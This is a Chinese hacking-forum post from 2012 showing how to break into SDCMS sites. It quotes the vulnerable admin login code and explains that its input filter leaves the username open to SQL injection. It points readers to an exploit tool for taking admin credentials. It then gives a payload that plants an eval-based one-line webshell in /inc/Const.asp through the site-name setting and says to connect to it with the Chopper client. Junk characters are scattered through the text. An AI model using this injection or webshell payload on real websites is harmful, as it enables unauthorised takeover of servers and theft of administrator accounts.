作者:T00LS 鬼哥, z1 K+ P0 c& H& c2 i
漏洞文件:后台目录/index.asp
6 T i( Q" Z* }( \8 _3 ~: a) g0 @- G( h; ]9 _1 P0 J# Z% a
Sub Check! o4 l2 I) \4 C& z$ D6 B3 Z0 p& o
Dim username,password,code,getcode,Rs: ^' |" e4 G# H- s9 I3 m
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
4 d% E+ X8 z$ y% v7 ?5 y# L3 W% C username=FilterText(Trim(Request.Form("username")),1). e% ^' ?: `- X
password=FilterText(Trim(Request.Form("password")),1)# G& V; Z5 F5 I2 |8 P" V
code=Trim(Request.Form("yzm"))
. a F! \+ B4 l. l getcode=Session("SDCMSCode"). G: D- z' ` k) X; m$ E
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died5 W! D9 x! V6 d- M1 S
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied& K2 ^: Z2 q0 W! ?
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
) L3 z; Z$ `5 k0 L) u r% q3 ] IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied$ K" F1 k2 ^( t( `5 h5 g( D
IF username="" or password="" Then6 G+ @3 W, g& h6 N# e. I' w. S) }
Echo "用户名或密码不能为空"ied& R8 r" z( G0 S. Q' m
Else
) s6 @% j- p' V. ^0 p Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")$ m! ]4 \* ?( K2 e8 G
IF Rs.Eof Then- e- a3 S0 H2 m8 g
AddLog username,GetIp,"登录失败",1
0 L5 ?0 z6 S3 O) Z& ^2 q$ R P' O Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"9 Y# ?, R% W* W& P. C
Else
5 z( z. d t% [" o. c& d Add_Cookies "sdcms_id",Rs(0)+ D4 n$ V) U; B3 F# X0 k/ r, n
Add_Cookies "sdcms_name",username8 R) D; W* @" h. }+ T8 }" d
Add_Cookies "sdcms_pwd",Rs(2)1 j2 N9 j0 S4 C2 T/ ^" z& H
Add_Cookies "sdcms_admin",Rs(3)
+ K# ^. @& f6 C& S* Z Add_Cookies "sdcms_alllever",Rs(4)3 g1 R: ?! X& p) U' {' T: U
Add_Cookies "sdcms_infolever",Rs(5)
3 @4 D* _! m+ U5 F: R Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
) y. b+ S& X7 c, V7 ~: L7 r AddLog username,GetIp,"登录成功",1
# v" X) w7 o2 U* a: S* x3 B '自动删除30天前的Log记录+ i" _' [% t3 A R) h
IF Sdcms_DataType Then! U T+ _; c) D) V: M2 {
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
' r) A& a* Q2 ?: E8 h( s Else( s& c4 p! {( m, u, j, }
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
6 R' u4 w; {7 k) N9 @1 s0 \. ~! z End IF4 J Q8 F& J5 m' O8 k( a; a
Go("sdcms_index.asp")" r1 E x5 `0 b' ?' O9 F) U
End IF
5 r M$ a! r/ R B1 @, U( e Rs.Close
8 G, k: t7 S- t( F Set Rs=Nothing
2 f' K0 p9 _! S. A End IF
/ d3 c9 l" P3 {# N8 v+ pEnd Sub
9 R4 o, L" N) k5 B8 z) g4 Y7 M- d+ k" P, W( O- p9 g: q" [& ^5 H; R9 O
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
1 U7 t* }4 Q1 {/ z( ~: \1 r3 V$ ?, L" \& x
Function FilterText(ByVal t0,ByVal t1)
( X# C Y: D+ K& o" S _ IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
3 b* L6 P6 E4 n* H% H$ L! L0 C t0=Trim(t0)2 b" s2 l0 l+ l! M+ J6 t% J: a
Select Case t1' U" P+ l% c: j' d4 g! @) k
Case "1"9 O9 t- m# I2 |* _/ Y- B- S
t0=Replace(t0,Chr(32),"")) H$ P- }; F0 S
t0=Replace(t0,Chr(13),"")
& g ?6 v: M+ _: ^- M1 H t0=Replace(t0,Chr(10)&Chr(10),"")
- t0 k f& R! i% K) K t0=Replace(t0,Chr(10),""): b2 { L8 V0 x% }, g
Case "2"
: @5 i) r/ ?) g9 J* q1 z# q t0=Replace(t0,Chr(8),"")'回格
p2 [: k ?% g# o2 j/ s' S t0=Replace(t0,Chr(9),"")'tab(水平制表符), L% M2 F: c# a: R$ }: x* F
t0=Replace(t0,Chr(10),"")'换行0 ^6 H! _0 Y; b- s" z r% {
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
1 _0 F4 t" i, Y+ ~6 Y( @ t0=Replace(t0,Chr(12),"")'换页
, w$ ?7 R( V3 c9 O5 p8 v t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
; o$ n* Q$ R) z' _6 ?6 v t0=Replace(t0,Chr(22),"")9 P/ |9 o; f* o2 e% {
t0=Replace(t0,Chr(32),"")'空格 SPACE
# n7 ~) J) W' N$ S- ] t0=Replace(t0,Chr(33),"")'!
& N. f h8 s: U/ i3 ^2 C& Q5 F+ | t0=Replace(t0,Chr(34),"")'"
0 {& b8 C! J( K4 O- q2 o t0=Replace(t0,Chr(35),"")'#
7 t: J) n" S) M1 h& h' ~ t0=Replace(t0,Chr(36),"")'$
3 c' Z& s# I) [' N t0=Replace(t0,Chr(37),"")'%
7 `6 C' f- e$ u4 d6 n( p- C0 S* m t0=Replace(t0,Chr(38),"")'&
. M0 ?8 o# n. n$ |4 p2 Q. u t0=Replace(t0,Chr(39),"")''6 n2 X3 A7 y. M' s( h
t0=Replace(t0,Chr(40),"")'(
@4 X3 t4 o( x3 Q8 p t0=Replace(t0,Chr(41),"")')
% B2 Z8 R5 N9 K" s% E) U t0=Replace(t0,Chr(42),"")'*
$ E6 P4 h! C2 X( E t0=Replace(t0,Chr(43),"")'+% U* T" K, _ }0 t1 Z( U1 R/ }- I0 z
t0=Replace(t0,Chr(44),"")',# [9 u- [- g! c8 J3 F- h9 m! b$ ]
t0=Replace(t0,Chr(45),"")'-
: @, f' I* e" x2 A5 l. |+ ` t0=Replace(t0,Chr(46),"")'.
7 [1 S8 q* e, k* Y3 {1 Y) L5 P+ s t0=Replace(t0,Chr(47),"")'// R/ m4 Z8 h8 v% _8 C. y0 ~
t0=Replace(t0,Chr(58),"")':+ ?/ h- E# D$ ^6 o& f [
t0=Replace(t0,Chr(59),"")';
) V! ^4 w* w! k6 F, G# f t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
2 }; }5 M9 T) a# n: ]/ M$ w' } t0=Replace(t0,Chr(63),"")'?: `6 F, ?5 E s u6 K& F( N
t0=Replace(t0,Chr(64),"")'@
' `5 ]0 g: C9 }4 S8 G& ]: N t0=Replace(t0,Chr(91),"")'\; z x8 [7 P1 O8 x8 W }
t0=Replace(t0,Chr(92),"")'\, R9 `# t! h$ i; l8 K
t0=Replace(t0,Chr(93),"")']- E# F3 ~" J5 a& b* Z* a
t0=Replace(t0,Chr(94),"")'^
) j7 c& o, T2 S- t( h t0=Replace(t0,Chr(95),"")'_
5 o: a, [0 I9 {: r/ B3 B4 \ t0=Replace(t0,Chr(96),"")'`1 {4 X" Y, x' E7 d: M' z
t0=Replace(t0,Chr(123),"")'{
5 c' q; {+ O# b t0=Replace(t0,Chr(124),"")'|( f3 m, u! d/ h' D3 M; y
t0=Replace(t0,Chr(125),"")'}
1 E0 C' |* O2 T! b) Q$ ^1 J t0=Replace(t0,Chr(126),"")'~
; Y* s0 J9 @) ? Case Else7 u4 {! P5 f# U: _! H: Z0 R* p
t0=Replace(t0, "&", "&")( c8 N% J4 ^7 }8 ?$ M
t0=Replace(t0, "'", "'")
4 |6 E4 F! T" w% q6 D M t0=Replace(t0, """", """)
- i; {" g2 C* L- s1 ]8 h1 [ t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")- m, G0 M6 L6 W$ z& x" |9 B% ~) _: R
End Select
$ O+ u0 j$ b/ G& G IF Instr(Lcase(t0),"expression")>0 Then
7 P9 { u$ p5 j) j! w; \ t0=Replace(t0,"expression","e­xpression", 1, -1, 0)$ g: E# e" J! q3 H
End If! F+ q0 g& y( i% g' ]7 c8 \
FilterText=t0. A/ t$ I" p7 I9 V* h: \/ ~% y0 X
End Function
+ y1 ~+ m4 I! U, p: N% S1 U
$ h0 N6 B7 P5 L t看到没。直接参数是1 只过滤5 l( {* z0 O, U- z+ j% s! m
t0=Replace(t0,Chr(32)," ")
; [' c4 ?& A$ q* t" f' h' s ~ t0=Replace(t0,Chr(13),"")
( h5 g/ c0 X) o: {: ?- W' ? t0=Replace(t0,Chr(10)&Chr(10),"
* O4 E7 k; R7 Q* A9 k6 w: q8 r' Y% G")
9 T* r3 J2 t5 q& I- ] t0=Replace(t0,Chr(10),"
/ Z" F' [4 |7 i e/ [ @4 f")& k- Q! {5 s5 a3 d
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!& q% I( O( X M& y% N5 M
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
. O# X9 Z; V, g J
0 {9 t( e3 _: p7 w3 y* F测试:
5 V/ @! c# I$ D! ^ h! o6 a4 w' {3 ]1 T4 X: w
2 ^8 e# g3 L3 Z, t
现在输入工具上验证码,然后点OK
. J$ P( _1 ^+ w0 }4 J! b
& T E* }7 H8 A: q7 t0 h0 F2 V( Z0 u( {4 [/ ~7 ]: t3 ]8 H/ U- s: b
看到我们直接进入后台管理界面了,呵呵!
) Z3 D. S# u: z2 k0 p" N" h* {0 w0 P+ U$ G; @
F) a: h& X d4 ?
/ P/ c+ }" K: D+ r1 U- r+ s这样直接进入后台了。。。。7 ]) r$ j- z/ |- ]' }; k& U. |
1 g1 _0 f4 C$ w6 K
6 Y8 Q; U9 V: O
7 w$ q( Q$ C# R6 OSDCMS提权:0 ?# V5 o0 o0 O" f$ X4 q+ S5 s
" p. G7 Y; T2 ]0 w- D. y$ q7 y
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
! g5 X* G) T8 k J7 b( L" c3 Y/ f# t8 f8 c5 ~
" Q, o$ p( {+ O2 Z5 G
# W w) f6 M2 i+ u2 s, s; ~& E5 X
OK,现在用菜刀连接下!
1 O3 Y+ {# u$ |! N5 j1 { c9 L- t1 L, \) F5 N6 f
. z# x. Z3 C5 b" X, a+ G
! `! c1 G5 W/ n& I. o5 c! i2 R( U& C
/ J! e# C" D% Y9 F
* L0 Y4 U; W4 n6 q |
发表于 2012-11-9 20:57:02
收藏
支持
反对